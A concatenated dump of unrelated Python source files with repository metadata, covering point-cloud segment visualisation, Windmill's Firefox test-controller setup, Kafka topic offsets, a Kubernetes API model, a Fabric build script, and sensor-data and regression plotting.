bc68de2bf6ac34b56dc7f29d133f2ca22e1fd975
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/visualize_segments.py
|
shiyoung77/symseg
|
bc68de2bf6ac34b56dc7f29d133f2ca22e1fd975
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/visualize_segments.py
|
shiyoung77/symseg
|
bc68de2bf6ac34b56dc7f29d133f2ca22e1fd975
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import argparse
import numpy as np
import open3d as o3d
import networkx as nx
def filter_segments(segments):
segments = [set(segment) for segment in segments]
N = len(segments)
print(f"number of segments before filtering: {N}")
G = nx.Graph()
G.add_nodes_from(range(N))
for i in range(len(segments)):
for j in range(i, len(segments)):
n1 = len(segments[i])
n2 = len(segments[j])
iou = len(segments[i] & segments[j]) / (n1 + n2)
if iou > 0.3:
G.add_edge(i, j)
filtered_segments = []
# connected components
cc_list = list(nx.connected_components(G))
for cc in cc_list:
cc = list(cc)
indices = segments[cc[0]]
for i in range(1, len(cc)):
indices &= segments[cc[i]]
filtered_segments.append(list(indices))
print(f"number of segments after filtering: {len(filtered_segments)}")
return filtered_segments
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# parser.add_argument("-d", "--dataset", type=str, default='dataset')
# parser.add_argument("-d", "--dataset", type=str, default='/home/lsy/dataset/ycb_video')
parser.add_argument("-d", "--dataset", type=str, default='/home/lsy/dataset/icra22_custom_ycb')
parser.add_argument("-v", "--video", type=str, default="0020")
args = parser.parse_args()
video_folder = os.path.join(args.dataset, args.video)
pcd = o3d.io.read_point_cloud(os.path.join(video_folder, 'sampled_pcd/cloud.pcd'))
# o3d.visualization.draw_geometries([pcd])
segments_file = os.path.join(video_folder, 'sampled_pcd/results/segments.txt')
with open(segments_file, 'r') as f:
segments = [line.strip().split() for line in f.readlines()]
for i, segment in enumerate(segments):
segments[i] = [int(idx) for idx in segment]
segments = filter_segments(segments)
segmented_indices = set()
for segment in segments:
segmented_indices = segmented_indices.union(segment)
all_indices = set(range(len(pcd.points)))
unsegmented_indices = all_indices - segmented_indices
print(f"{len(segmented_indices) = }")
print(f"{len(unsegmented_indices) = }")
random_colors = np.random.random((100, 3))
segment_pcds = [pcd.select_by_index(segment).paint_uniform_color(random_colors[i]) for i, segment in enumerate(segments)]
unsegmented_pcd = pcd.select_by_index(list(unsegmented_indices)).paint_uniform_color([0, 0, 0])
print(f"number of segments: {len(segment_pcds)}")
o3d.visualization.draw_geometries(segment_pcds + [unsegmented_pcd])
| 34.868421
| 125
| 0.666038
|
7c604b7b0343c1a2565fc4f8abcae24dabc7b1da
| 5,825
|
py
|
Python
|
build/env/lib/python2.7/site-packages/windmill-1.3-py2.7.egg/windmill/browser/__init__.py
|
lumanjiao/XLS_BigData
|
2c4c37872b8636df1c8b0e005bc12a635a753c7a
|
[
"Apache-2.0"
] | 11
|
2019-03-20T07:38:35.000Z
|
2021-06-18T09:42:46.000Z
|
build/env/lib/python2.6/site-packages/windmill-1.3-py2.6.egg/windmill/browser/__init__.py
|
lockhart39/HueQualityAndIngestionApp
|
c75e55a43a8bdeb7aa0f5bf2101ec72b01dcac1c
|
[
"Apache-2.0"
] | null | null | null |
build/env/lib/python2.6/site-packages/windmill-1.3-py2.6.egg/windmill/browser/__init__.py
|
lockhart39/HueQualityAndIngestionApp
|
c75e55a43a8bdeb7aa0f5bf2101ec72b01dcac1c
|
[
"Apache-2.0"
] | 5
|
2019-06-29T03:13:02.000Z
|
2020-04-23T04:47:11.000Z
|
# Copyright (c) 2006-2007 Open Source Applications Foundation
# Copyright (c) 2008-2009 Mikeal Rogers <mikeal.rogers@gmail.com>
# Copyright (c) 2009 Domen Kozar <domen@dev.si>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import windmill
import sys
import copy
from pkg_resources import resource_string
import os
if not sys.version.startswith('2.4'):
from urlparse import urlparse
else:
# python 2.4
from windmill.tools.urlparse_25 import urlparse
windmill.browser_registry = {}
def get_firefox_controller():
"""Get the firefox browser object"""
from windmill.dep import mozrunner
global_settings = mozrunner.global_settings
from windmill.dep import simplesettings
mozrunner_settings = simplesettings.initialize_settings(global_settings, mozrunner,
local_env_variable=mozrunner.settings_env)
for key, value in mozrunner.settings.items():
if not windmill.settings.has_key(key):
windmill.settings[key] = value
test_url = windmill.get_test_url(windmill.settings['TEST_URL'])
if windmill.settings['INSTALL_FIREBUG']:
windmill.settings['MOZILLA_PLUGINS'] = [os.path.join(os.path.dirname(__file__), os.path.pardir, 'xpi', 'firebug-1.4.0b7-fx.xpi')]
prop_hash = {
'extensions.chromebug.openalways' : True,
'extensions.chromebug.showIntroduction' : False,
'general.warnOnAboutConfig' : False,
'extensions.venkman.enableChromeFilter' : False,
# Get rid of default browser check
"browser.shell.checkDefaultBrowser": False,
# Suppress authentication confirmations
"network.http.phishy-userpass-length": 255,
# Disable pop-up blocking
"browser.allowpopups": True,
"dom.disable_open_during_load": False,
# Open links in new windows (Firefox 2.0)
"browser.link.open_external": 2,
"browser.link.open_newwindow": 2,
# Configure local proxy
"network.proxy.http": '127.0.0.1',
"network.proxy.http_port": windmill.settings['SERVER_HTTP_PORT'],
"network.proxy.no_proxies_on": "",
"network.proxy.type": 1,
#"network.http.proxy.pipelining" : True,
"network.http.max-connections": 10,
"network.http.max-connections-per-server": 8,
# "network.http.max-persistent-connections-per-proxy": 2,
# "network.http.max-persistent-connections-per-server": 2,
"network.http.pipelining.maxrequests": 10,
# Turn off favicon requests, no need for even more requests
"browser.chrome.favicons": False,
"startup.homepage_override_url": test_url,
"browser.startup.homepage": test_url,
"startup.homepage_welcome_url": "",
# Disable security warnings
"security.warn_submit_insecure": False,
"security.warn_submit_insecure.show_once": False,
"security.warn_entering_secure": False,
"security.warn_entering_secure.show_once": False,
"security.warn_entering_weak": False,
"security.warn_entering_weak.show_once": False,
"security.warn_leaving_secure": False,
"security.warn_leaving_secure.show_once": False,
"security.warn_viewing_mixed": False,
"security.warn_viewing_mixed.show_once": False,
# Disable cache
"browser.cache.disk.enable": False,
"browser.sessionstore.resume_from_crash": False,
# self.user_pref('"browser.cache.memory.enable", false')
# Disable "do you want to remember this password?"
"signon.rememberSignons": False,
"dom.max_script_run_time": 100,
# Disable OSCP validation, breaks through proxy.
"security.OCSP.enabled":0,
#Make the firefox IDE stop showing the location bar
"dom.disable_window_open_feature.location":False,
"browser.rights.3.shown": True,
}
if windmill.has_ssl:
prop_hash["network.proxy.ssl"] = '127.0.0.1'
prop_hash["network.proxy.ssl_port"] = windmill.settings['SERVER_HTTP_PORT']
windmill.settings['MOZILLA_PREFERENCES'].update(prop_hash)
windmill.settings['MOZILLA_CMD_ARGS'] = [test_url]
controller = mozrunner.get_moz_from_settings(copy.copy(windmill.settings))
# Override cert8.db with one from windmill which has windmill certificate
# in it, that way self-signed certificate warning is suppressed.
cert8 = resource_string(__name__, 'cert8.db')
if sys.platform not in ('win32', 'cygwin',):
f = open(os.path.join(controller.profile, 'cert8.db'), 'w')
else:
f = open(os.path.join(controller.profile, 'cert8.db'), 'wb')
f.write(cert8)
f.close()
windmill.settings['MOZILLA_PROFILE'] = mozrunner.settings['MOZILLA_PROFILE']
return controller
def get_ie_controller():
"""Get the IE browser object"""
import ie
browser = ie.InternetExplorer()
return browser
def get_safari_controller():
"""Get the Safari browser object"""
import safari
browser = safari.Safari()
return browser
def get_chrome_controller():
"""Get the Safari browser object"""
import chrome
browser = chrome.Chrome()
return browser
| 39.09396
| 137
| 0.671416
|
195e5eb29267220c9fe00eb0f89deac36067d74f
| 286
|
py
|
Python
|
tests/integration/aiohttp_utils.py
|
Rippling/vcrpy
|
69dd6e7c1e9fec9b3390a2423e605293dc58003d
|
[
"MIT"
] | null | null | null |
tests/integration/aiohttp_utils.py
|
Rippling/vcrpy
|
69dd6e7c1e9fec9b3390a2423e605293dc58003d
|
[
"MIT"
] | null | null | null |
tests/integration/aiohttp_utils.py
|
Rippling/vcrpy
|
69dd6e7c1e9fec9b3390a2423e605293dc58003d
|
[
"MIT"
] | null | null | null |
import asyncio
@asyncio.coroutine
def aiohttp_request(session, method, url, as_text, **kwargs):
response = yield from session.request(method, url, **kwargs) # NOQA: E999
return response, (yield from response.text()) if as_text else (yield from response.json()) # NOQA: E999
| 35.75
| 108
| 0.723776
|
431d8d77a9a2ab0f9cef81a155d0e75224f78282
| 4,690
|
py
|
Python
|
corehq/apps/change_feed/topics.py
|
akashkj/commcare-hq
|
b00a62336ec26cea1477dfb8c048c548cc462831
|
[
"BSD-3-Clause"
] | null | null | null |
corehq/apps/change_feed/topics.py
|
akashkj/commcare-hq
|
b00a62336ec26cea1477dfb8c048c548cc462831
|
[
"BSD-3-Clause"
] | null | null | null |
corehq/apps/change_feed/topics.py
|
akashkj/commcare-hq
|
b00a62336ec26cea1477dfb8c048c548cc462831
|
[
"BSD-3-Clause"
] | null | null | null |
from kafka.common import OffsetRequestPayload
from corehq.apps.app_manager.util import app_doc_types
from corehq.apps.change_feed.connection import get_simple_kafka_client
from corehq.apps.change_feed.exceptions import UnavailableKafkaOffset
from corehq.form_processor.models import XFormInstanceSQL
DOMAIN = 'domain'
META = 'meta'
APP = 'app'
CASE_SQL = 'case-sql'
FORM_SQL = 'form-sql'
SMS = 'sms'
LEDGER = 'ledger'
COMMCARE_USER = 'commcare-user'
GROUP = 'group'
WEB_USER = 'web-user'
LOCATION = 'location'
SYNCLOG_SQL = 'synclog-sql'
CASE_TOPICS = (CASE_SQL, )
FORM_TOPICS = (FORM_SQL, )
USER_TOPICS = (COMMCARE_USER, WEB_USER)
ALL = (
CASE_SQL,
COMMCARE_USER,
DOMAIN,
FORM_SQL,
GROUP,
LEDGER,
META,
SMS,
WEB_USER,
APP,
LOCATION,
SYNCLOG_SQL,
)
def get_topic_for_doc_type(doc_type, data_source_type=None, default_topic=None):
from corehq.apps.change_feed import document_types
from corehq.apps.locations.document_store import LOCATION_DOC_TYPE
if doc_type in document_types.CASE_DOC_TYPES:
return CASE_SQL
elif doc_type in XFormInstanceSQL.ALL_DOC_TYPES:
return FORM_SQL
elif doc_type in document_types.DOMAIN_DOC_TYPES:
return DOMAIN
elif doc_type in document_types.MOBILE_USER_DOC_TYPES:
return COMMCARE_USER
elif doc_type in document_types.WEB_USER_DOC_TYPES:
return WEB_USER
elif doc_type in document_types.GROUP_DOC_TYPES:
return GROUP
elif doc_type in document_types.SYNCLOG_DOC_TYPES:
return SYNCLOG_SQL
elif doc_type in app_doc_types():
return APP
elif doc_type == LOCATION_DOC_TYPE:
return LOCATION
elif doc_type in ALL: # for docs that don't have a doc_type we use the Kafka topic
return doc_type
elif default_topic:
return default_topic
else:
# at some point we may want to make this more granular
return META # note this does not map to the 'meta' Couch database
def get_topic_offset(topic):
"""
:returns: The kafka offset dict for the topic."""
return get_multi_topic_offset([topic])
def get_multi_topic_offset(topics):
"""
:returns: A dict of offsets keyed by topic and partition"""
return _get_topic_offsets(topics, latest=True)
def get_multi_topic_first_available_offsets(topics):
"""
:returns: A dict of offsets keyed by topic and partition"""
return _get_topic_offsets(topics, latest=False)
def _get_topic_offsets(topics, latest):
"""
:param topics: list of topics
:param latest: True to fetch latest offsets, False to fetch earliest available
:return: dict: { (topic, partition): offset, ... }
"""
# https://cwiki.apache.org/confluence/display/KAFKA/A+Guide+To+The+Kafka+Protocol#AGuideToTheKafkaProtocol-OffsetRequest
# https://cfchou.github.io/blog/2015/04/23/a-closer-look-at-kafka-offsetrequest/
assert set(topics) <= set(ALL)
with get_simple_kafka_client() as client:
partition_meta = client.topic_partitions
# only return the offset of the latest message in the partition
num_offsets = 1
time_value = -1 if latest else -2
offsets = {}
offset_requests = []
for topic in topics:
partitions = list(partition_meta.get(topic, {}))
for partition in partitions:
offsets[(topic, partition)] = None
offset_requests.append(OffsetRequestPayload(topic, partition, time_value, num_offsets))
responses = client.send_offset_request(offset_requests)
for r in responses:
offsets[(r.topic, r.partition)] = r.offsets[0]
return offsets
def validate_offsets(expected_offsets):
"""
Takes in a dictionary of offsets (topics to checkpoint numbers) and ensures they are all available
in the current kafka feed
"""
if expected_offsets:
topics = {x[0] for x in expected_offsets.keys()}
available_offsets = get_multi_topic_first_available_offsets(topics)
for topic_partition, offset in expected_offsets.items():
topic, partition = topic_partition
if topic_partition not in available_offsets:
raise UnavailableKafkaOffset("Invalid partition '{}' for topic '{}'".format(partition, topic))
if expected_offsets[topic_partition] < available_offsets[topic_partition]:
message = (
'First available topic offset for {}:{} is {} but needed {}.'
).format(topic, partition, available_offsets[topic_partition], expected_offsets[topic_partition])
raise UnavailableKafkaOffset(message)
| 33.5
| 124
| 0.696802
|
b74a1e0cca76602597ab33ce92cb74cb847e1ccc
| 26
|
py
|
Python
|
rio_viz/ressources/__init__.py
|
geospatial-jeff/rio-viz
|
84aee810e5d6eb8b95a6a230ea56ddd65ffaebc6
|
[
"MIT"
] | null | null | null |
rio_viz/ressources/__init__.py
|
geospatial-jeff/rio-viz
|
84aee810e5d6eb8b95a6a230ea56ddd65ffaebc6
|
[
"MIT"
] | null | null | null |
rio_viz/ressources/__init__.py
|
geospatial-jeff/rio-viz
|
84aee810e5d6eb8b95a6a230ea56ddd65ffaebc6
|
[
"MIT"
] | null | null | null |
"""titiler ressources."""
| 13
| 25
| 0.653846
|
bdb74fde41c500b91ae7315f8ba118dcf6464215
| 7,099
|
py
|
Python
|
kubernetes/client/models/v1_controller_revision_list.py
|
carloscastrojumo/python
|
f461dd42d48650a4ae1b41d630875cad9fcb68ad
|
[
"Apache-2.0"
] | 2
|
2021-03-09T12:42:05.000Z
|
2021-03-09T13:27:50.000Z
|
kubernetes/client/models/v1_controller_revision_list.py
|
carloscastrojumo/python
|
f461dd42d48650a4ae1b41d630875cad9fcb68ad
|
[
"Apache-2.0"
] | 7
|
2021-04-13T03:04:42.000Z
|
2022-03-02T03:10:18.000Z
|
kubernetes/client/models/v1_controller_revision_list.py
|
carloscastrojumo/python
|
f461dd42d48650a4ae1b41d630875cad9fcb68ad
|
[
"Apache-2.0"
] | 1
|
2019-07-05T07:54:10.000Z
|
2019-07-05T07:54:10.000Z
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.17
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1ControllerRevisionList(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'api_version': 'str',
'items': 'list[V1ControllerRevision]',
'kind': 'str',
'metadata': 'V1ListMeta'
}
attribute_map = {
'api_version': 'apiVersion',
'items': 'items',
'kind': 'kind',
'metadata': 'metadata'
}
def __init__(self, api_version=None, items=None, kind=None, metadata=None, local_vars_configuration=None): # noqa: E501
"""V1ControllerRevisionList - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._api_version = None
self._items = None
self._kind = None
self._metadata = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
self.items = items
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
@property
def api_version(self):
"""Gets the api_version of this V1ControllerRevisionList. # noqa: E501
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources # noqa: E501
:return: The api_version of this V1ControllerRevisionList. # noqa: E501
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""Sets the api_version of this V1ControllerRevisionList.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources # noqa: E501
:param api_version: The api_version of this V1ControllerRevisionList. # noqa: E501
:type: str
"""
self._api_version = api_version
@property
def items(self):
"""Gets the items of this V1ControllerRevisionList. # noqa: E501
Items is the list of ControllerRevisions # noqa: E501
:return: The items of this V1ControllerRevisionList. # noqa: E501
:rtype: list[V1ControllerRevision]
"""
return self._items
@items.setter
def items(self, items):
"""Sets the items of this V1ControllerRevisionList.
Items is the list of ControllerRevisions # noqa: E501
:param items: The items of this V1ControllerRevisionList. # noqa: E501
:type: list[V1ControllerRevision]
"""
if self.local_vars_configuration.client_side_validation and items is None: # noqa: E501
raise ValueError("Invalid value for `items`, must not be `None`") # noqa: E501
self._items = items
@property
def kind(self):
"""Gets the kind of this V1ControllerRevisionList. # noqa: E501
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds # noqa: E501
:return: The kind of this V1ControllerRevisionList. # noqa: E501
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""Sets the kind of this V1ControllerRevisionList.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds # noqa: E501
:param kind: The kind of this V1ControllerRevisionList. # noqa: E501
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""Gets the metadata of this V1ControllerRevisionList. # noqa: E501
:return: The metadata of this V1ControllerRevisionList. # noqa: E501
:rtype: V1ListMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this V1ControllerRevisionList.
:param metadata: The metadata of this V1ControllerRevisionList. # noqa: E501
:type: V1ListMeta
"""
self._metadata = metadata
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1ControllerRevisionList):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1ControllerRevisionList):
return True
return self.to_dict() != other.to_dict()
| 34.461165
| 312
| 0.634878
|
216ecf0f1e333ebcd50362f20c84e83d9e997fb3
| 1,955
|
py
|
Python
|
fabfile.py
|
sporsh/carnifex
|
82dd3bd2bc134dfb69a78f43171e227f2127060b
|
[
"MIT"
] | 4
|
2015-12-21T00:59:22.000Z
|
2021-02-08T02:33:52.000Z
|
fabfile.py
|
sporsh/carnifex
|
82dd3bd2bc134dfb69a78f43171e227f2127060b
|
[
"MIT"
] | null | null | null |
fabfile.py
|
sporsh/carnifex
|
82dd3bd2bc134dfb69a78f43171e227f2127060b
|
[
"MIT"
] | 1
|
2017-03-24T09:12:45.000Z
|
2017-03-24T09:12:45.000Z
|
from fabric.api import local
TESTS_PATH = 'test'
def test(path=TESTS_PATH, coverage=False, nosetup=False, *args, **kwargs):
nosetests(path, coverage, *args, **kwargs)
if not nosetup:
local("python setup.py check")
def nosetests(path=TESTS_PATH, coverage=False):
"""Run tests using nosetests with or without coverage
"""
args = ["nosetests"]
if coverage:
args.extend(["--with-coverage",
"--cover-erase",
"--cover-package=carnifex",
"--cover-html"])
args.append(path)
local(' '.join(args))
def trial(path=TESTS_PATH, coverage=False):
"""Run tests using trial
"""
args = ['trial']
if coverage:
args.append('--coverage')
args.append(path)
print args
local(' '.join(args))
def unittest(path=TESTS_PATH):
"""Run tests using the unittest module
"""
local("python -m unittest discover -s %s" % path)
def release():
test()
local("python setup.py sdist upload")
def clean(verified=False):
local("python setup.py clean")
args = ["git clean",
"-dx",
"-e '.pydevproject'",
"-e '.project'"]
if not verified:
args.append("-n")
else:
args.append("-f")
local(' '.join(args))
def whatsnew():
local("git fetch")
locallog = local("git log --abbrev-commit "
"--format='%Cgreen* %C(yellow)%h %Cblue%aN %Cgreen%ar "
"%Creset%s' FETCH_HEAD..", capture=True)
remotelog = local("git log --abbrev-commit "
"--format='%Cred* %C(yellow)%h %Cblue%aN %Cgreen%ar "
"%Creset%s' ..FETCH_HEAD", capture=True)
if locallog:
print
print "YOUR CHANGES:"
print "-------------"
print locallog
if remotelog:
print
print "REMOTE CHANGES:"
print "---------------"
print remotelog
| 26.780822
| 76
| 0.539642
|
06f951fec73ace15982a9fe04f0f17106f8d37d4
| 6,540
|
py
|
Python
|
ClarenceData/sensor data/Plot.py
|
acse-2020/acse2020-acse9-finalreport-acse-yl2020
|
310287b8d0e6347895047e2766b4b6fc1be24716
|
[
"Apache-2.0"
] | null | null | null |
ClarenceData/sensor data/Plot.py
|
acse-2020/acse2020-acse9-finalreport-acse-yl2020
|
310287b8d0e6347895047e2766b4b6fc1be24716
|
[
"Apache-2.0"
] | null | null | null |
ClarenceData/sensor data/Plot.py
|
acse-2020/acse2020-acse9-finalreport-acse-yl2020
|
310287b8d0e6347895047e2766b4b6fc1be24716
|
[
"Apache-2.0"
] | 1
|
2022-01-29T17:06:14.000Z
|
2022-01-29T17:06:14.000Z
|
#!/usr/bin/env python3.8
#//////////////////////////////////////////////////////
#-- Dr Laetitia Mottet
# Applied Modelling and Computation Group
# Department of Earth Science and Engineering
# Imperial College London
# l.mottet@imperial.ac.uk
# laetitia.mottet@gmail.com
#//////////////////////////////////////////////////////
# # # ########################## # # #
# # # ###### LIBRARIES ###### # # #
# # # ########################## # # #
from numpy import *
from math import *
import sys, os
sys.path.append("/home/lmottet/fluidity-temp/python/")
import numpy as np
import vtk
import vtktools
import matplotlib.pyplot as plt
import datetime, time
# # # ########################## # # #
# # # ###### FUNCTIONS ###### # # #
# # # ########################## # # #
#-------------------------------------------------#
#-- Function to read data in a text file -#
#-------------------------------------------------#
def ReadData(filename):
output = []
sf = open(filename, 'r')
data = sf.readlines()
for i in range(0,len(data)):
x = str.split(data[i])
y = [float(v) for v in x]
output.append(y)
output = np.transpose(output)
return output
# # # ########################## # # #
# # # ###### MAIN ###### # # #
# # # ########################## # # #
if __name__ == '__main__':
tic = time.time()
CO2_Fluidity = ReadData('CO2_Fluidity.dat')
print ('CO2_Fluidity ::', CO2_Fluidity)
CO2_Experiment = ReadData('CO2_Experiment.dat')
print ('CO2_Experiment ::', CO2_Experiment)
#-----------------------#
#-- PLTOS --#
#-----------------------#
figID = 0
#--------------#
#-- FIGURE 1 --#
#--------------#
#-- Plot Fluidity data only
figID += 1
plt.figure(figID)
ax = plt.subplot(111)
colorSt = ['black', 'magenta', 'green', 'red', 'yellow', 'cyan', 'orange']
lineSt = ['-', '-', '-', '-', '-', '-', '-']
#-------------------------#
#-- Plot Fluidity data --#
#-------------------------#
for sensorID in range(0,7):
plt.plot(CO2_Fluidity[0], CO2_Fluidity[sensorID+1], color=colorSt[sensorID], linestyle=lineSt[sensorID], marker=' ', label='Sensor '+str(sensorID+1)+' (CFD)')
plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.22), ncol=3, fontsize=10,fancybox=True, shadow=True)
plt.title('Fluidity CO2',y=1.23)
plt.xlabel('Time (sec.)')
plt.ylabel('CO2 (ppm)')
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width , box.height* 0.85])
axes = plt.gca()
axes.set_ylim(400,1600)
axes.set_xlim(0,1500)
plt.grid()
plt.savefig('CO2_Fluidity.svg')
plt.close()
#--------------#
#-- FIGURE 2 --#
#--------------#
#-- Plot Experiment data only
figID += 1
plt.figure(figID)
ax = plt.subplot(111)
colorSt = ['black', 'magenta', 'green', 'red', 'yellow', 'cyan', 'orange']
lineSt = ['-', '-', '-', '-', '-', '-', '-']
#-------------------------#
#-- Plot Experiment data --#
#-------------------------#
for sensorID in range(0,7):
plt.plot(CO2_Experiment[0], CO2_Experiment[sensorID+1], color=colorSt[sensorID], linestyle=lineSt[sensorID], marker=' ', label='Sensor '+str(sensorID+1)+' (Exp)')
plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.22), ncol=3, fontsize=10,fancybox=True, shadow=True)
plt.title('Experiment CO2',y=1.23)
plt.xlabel('Time (sec.)')
plt.ylabel('CO2 (ppm)')
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width , box.height* 0.85])
axes = plt.gca()
axes.set_ylim(400,1600)
axes.set_xlim(0,1500)
plt.grid()
plt.savefig('CO2_Experiment.svg')
plt.close()
#--------------#
#-- FIGURE 3 --#
#--------------#
#-- Plot Experiment and Fluidity for one sensor on 1 plot
colorSt = ['black', 'magenta', 'green', 'red', 'yellow', 'cyan', 'orange']
lineSt = ['-', '-', '-', '-', '-', '-', '-']
for sensorID in range(0,7):
figID += 1
plt.figure(figID)
ax = plt.subplot(111)
#-------------------------#
#-- Plot Fluidity data --#
#-------------------------#
plt.plot(CO2_Fluidity[0], CO2_Fluidity[sensorID+1], color=colorSt[sensorID], linestyle='-', marker=' ', label='Sensor '+str(sensorID+1)+' (CFD)')
#-------------------------#
#-- Plot Experiment data --#
#-------------------------#
plt.plot(CO2_Experiment[0], CO2_Experiment[sensorID+1], color=colorSt[sensorID], linestyle='--', marker=' ', label='Sensor '+str(sensorID+1)+' (Exp)')
plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.22), ncol=3, fontsize=10,fancybox=True, shadow=True)
plt.xlabel('Time (sec.)')
plt.ylabel('CO2 (ppm)')
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width , box.height* 0.85])
axes = plt.gca()
axes.set_ylim(400,1600)
axes.set_xlim(0,1500)
plt.grid()
plt.savefig('CO2_FluidityExperiment_sensor'+str(sensorID+1)+'.svg')
plt.close()
#--------------#
#-- FIGURE 4 --#
#--------------#
#-- Plot Experiment and Fluidity data
figID += 1
plt.figure(figID)
ax = plt.subplot(111)
colorSt = ['black', 'magenta', 'green', 'red', 'yellow', 'cyan', 'orange']
lineSt = ['-', '-', '-', '-', '-', '-', '-']
#-------------------------#
#-- Plot Fluidity data --#
#-------------------------#
for sensorID in range(0,7):
plt.plot(CO2_Fluidity[0], CO2_Fluidity[sensorID+1], color=colorSt[sensorID], linestyle='-', marker=' ', label='Sensor '+str(sensorID+1)+' (CFD)')
#-------------------------#
#-- Plot Experiment data --#
#-------------------------#
for sensorID in range(0,7):
plt.plot(CO2_Experiment[0], CO2_Experiment[sensorID+1], color=colorSt[sensorID], linestyle='--', marker=' ', label='Sensor '+str(sensorID+1)+' (Exp)')
plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.22), ncol=3, fontsize=10,fancybox=True, shadow=True)
plt.xlabel('Time (sec.)')
plt.ylabel('CO2 (ppm)')
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width , box.height* 0.85])
axes = plt.gca()
axes.set_ylim(400,1600)
axes.set_xlim(0,1500)
plt.grid()
plt.savefig('CO2_FluidityExperiment.svg')
plt.close()
toc = time.time()
print ('\n\nTime : ', toc - tic, 'sec')
| 34.240838
| 173
| 0.48792
|
32553253537a8c932ffa1c0c19ded0f0d3121154
| 908
|
py
|
Python
|
100 Curso aulapharos/008 BibliotecasModulos/005 Spyder scikit-learn/scikit-learn004.py
|
malcabaut/AprendiendoPython
|
b1e8731f1614b08b5ace1b7d1ecbeb041b21f28b
|
[
"MIT"
] | null | null | null |
100 Curso aulapharos/008 BibliotecasModulos/005 Spyder scikit-learn/scikit-learn004.py
|
malcabaut/AprendiendoPython
|
b1e8731f1614b08b5ace1b7d1ecbeb041b21f28b
|
[
"MIT"
] | null | null | null |
100 Curso aulapharos/008 BibliotecasModulos/005 Spyder scikit-learn/scikit-learn004.py
|
malcabaut/AprendiendoPython
|
b1e8731f1614b08b5ace1b7d1ecbeb041b21f28b
|
[
"MIT"
] | null | null | null |
from sklearn import metrics
import numpy as np
import matplotlib.pyplot as plt
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
import pandas as pd
USAhousing = pd.read_csv('USA_Housing.csv')
X = USAhousing[['Avg. Area Income', 'Avg. Area House Age', 'Avg. Area Number of Rooms','Avg. Area Number of Bedrooms', 'Area Population']]
Y = USAhousing['Price']
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4)
lm = LinearRegression()
lm.fit(X_train,Y_train)
coeficientes= pd.DataFrame(lm.coef_,X.columns,columns=['Coefficient'])
print(coeficientes)
predicciones = lm.predict(X_test)
plt.scatter(Y_test,predicciones)
print('MAE:', metrics.mean_absolute_error(Y_test, predicciones))
print('MSE:', metrics.mean_squared_error(Y_test, predicciones))
print('RMSE:', np.sqrt(metrics.mean_squared_error(Y_test, predicciones)))
| 47.789474
| 139
| 0.773128
|
91efeb21d07467bf90ae566741198e2f781b0ab3
| 894
|
py
|
Python
|
test/test_fixed_asset_input.py
|
altoyield/python-beanieclient
|
448b8dd328054eaf32dd7d0bdff700e603b5c27d
|
[
"Apache-2.0"
] | null | null | null |
test/test_fixed_asset_input.py
|
altoyield/python-beanieclient
|
448b8dd328054eaf32dd7d0bdff700e603b5c27d
